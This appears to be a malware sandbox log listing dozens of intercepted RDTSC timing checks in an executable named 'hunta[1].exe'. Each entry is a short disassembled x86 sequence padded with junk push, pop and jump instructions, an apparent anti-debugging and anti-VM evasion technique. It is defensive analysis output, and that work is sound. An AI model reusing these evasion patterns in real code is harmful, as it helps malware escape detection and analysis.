Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118AE22 second address: 118AE2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1190C9B second address: 1190C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118FEF1 second address: 118FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118FEF5 second address: 118FEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198BE4 second address: 1198BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198BEA second address: 1198C1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF2E5514DF6h 0x00000012 pushad 0x00000013 js 00007FF2E5514DE6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198C1A second address: 1198C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198D89 second address: 1198D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1137B09 second address: 1137B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 119E65D second address: 119E663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 119E663 second address: 119E667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A46F7 second address: 11A46FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A499C second address: 11A49A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A49A6 second address: 11A49AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A49AA second address: 11A49B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4B25 second address: 11A4B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF2E5514DF2h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4B3E second address: 11A4B43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4CBF second address: 11A4CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4CDB second address: 11A4CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4CDF second address: 11A4CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1130EED second address: 1130EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1130EF3 second address: 1130EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4E5C second address: 11A4E77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007FF2E55A2C26h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E55A2C2Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4E77 second address: 11A4E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4E97 second address: 11A4EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF2E55A2C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EA6 second address: 11A4EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EAA second address: 11A4EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EB0 second address: 11A4EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EB6 second address: 11A4EBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4FFE second address: 11A5003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A518E second address: 11A51AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push edx 0x00000008 jmp 00007FF2E55A2C36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A51AE second address: 11A51B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113CA95 second address: 113CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113CAA0 second address: 113CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A985E second address: 11A986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A9E2C second address: 11A9E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A9E47 second address: 11A9E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jno 00007FF2E55A2C26h 0x00000010 jng 00007FF2E55A2C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A954D second address: 11A956B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A956B second address: 11A9586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF2E55A2C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11AA3D4 second address: 11AA3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11AA3DA second address: 11AA3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11AA3E0 second address: 11AA3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B41DA second address: 11B41E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2B83 second address: 11B2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a jmp 00007FF2E5514DECh 0x0000000f jns 00007FF2E5514DE6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2CF6 second address: 11B2D02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2D02 second address: 11B2D12 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E5514DE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2D12 second address: 11B2D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2E65 second address: 11B2E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2E6B second address: 11B2E78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E55A2C28h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2FE7 second address: 11B2FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B38DF second address: 11B3918 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF2E55A2C2Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF2E55A2C38h 0x00000019 jnl 00007FF2E55A2C26h 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B3918 second address: 11B3928 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DF2h 0x00000008 jbe 00007FF2E5514DE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 115C543 second address: 115C55C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f jg 00007FF2E55A2C26h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 115C55C second address: 115C579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push esi 0x0000000c jbe 00007FF2E5514DE6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007FF2E5514DE6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B404A second address: 11B4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jnp 00007FF2E55A2C26h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B4059 second address: 11B405E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B405E second address: 11B4066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2832 second address: 11B2836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2836 second address: 11B2843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2843 second address: 11B284D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C44 second address: 1176C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C48 second address: 1176C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C4C second address: 1176C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C52 second address: 1176C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176C57 second address: 1176CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF2E55A2C28h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a adc edi, 41F36D34h 0x00000030 lea eax, dword ptr [ebp+1247C9A6h] 0x00000036 mov ecx, dword ptr [ebp+122D2A4Dh] 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176CA3 second address: 1176CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176CA7 second address: 1176CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1176CAB second address: 115BA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E5514DEDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 jmp 00007FF2E5514DEEh 0x00000019 popad 0x0000001a pop edi 0x0000001b nop 0x0000001c call dword ptr [ebp+122D2037h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF2E5514DF0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177397 second address: 11773A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF2E55A2C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11773A4 second address: 11773A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11778A3 second address: 11778D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF2E55A2C39h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, 53426DAFh 0x00000011 push 00000004h 0x00000013 movzx edx, ax 0x00000016 nop 0x00000017 push esi 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1177DF5 second address: 1177DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178067 second address: 115C543 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f call dword ptr [ebp+1244E4F4h] 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FF2E55A2C26h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7D58 second address: 11B7D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7EF6 second address: 11B7EFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7EFB second address: 11B7F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF2E5514DE6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F08 second address: 11B7F19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F19 second address: 11B7F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F1D second address: 11B7F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF2E55A2C26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B7F2B second address: 11B7F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8076 second address: 11B8080 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8080 second address: 11B8086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8086 second address: 11B80C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF2E55A2C26h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007FF2E55A2C28h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FF2E55A2C33h 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FF2E55A2C2Bh 0x00000026 jmp 00007FF2E55A2C2Fh 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B80C4 second address: 11B80CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B824B second address: 11B8257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FF2E55A2C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8257 second address: 11B825D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B83F2 second address: 11B83F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B83F6 second address: 11B842D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF2E5514E05h 0x0000000c jg 00007FF2E5514DE6h 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 ja 00007FF2E5514DE8h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B842D second address: 11B8467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8467 second address: 11B846D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B85D9 second address: 11B85E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF2E55A2C26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B85E9 second address: 11B85F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B873A second address: 11B8751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8751 second address: 11B8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B8757 second address: 11B8781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E55A2C26h 0x0000000a popad 0x0000000b jbe 00007FF2E55A2C43h 0x00000011 jmp 00007FF2E55A2C37h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
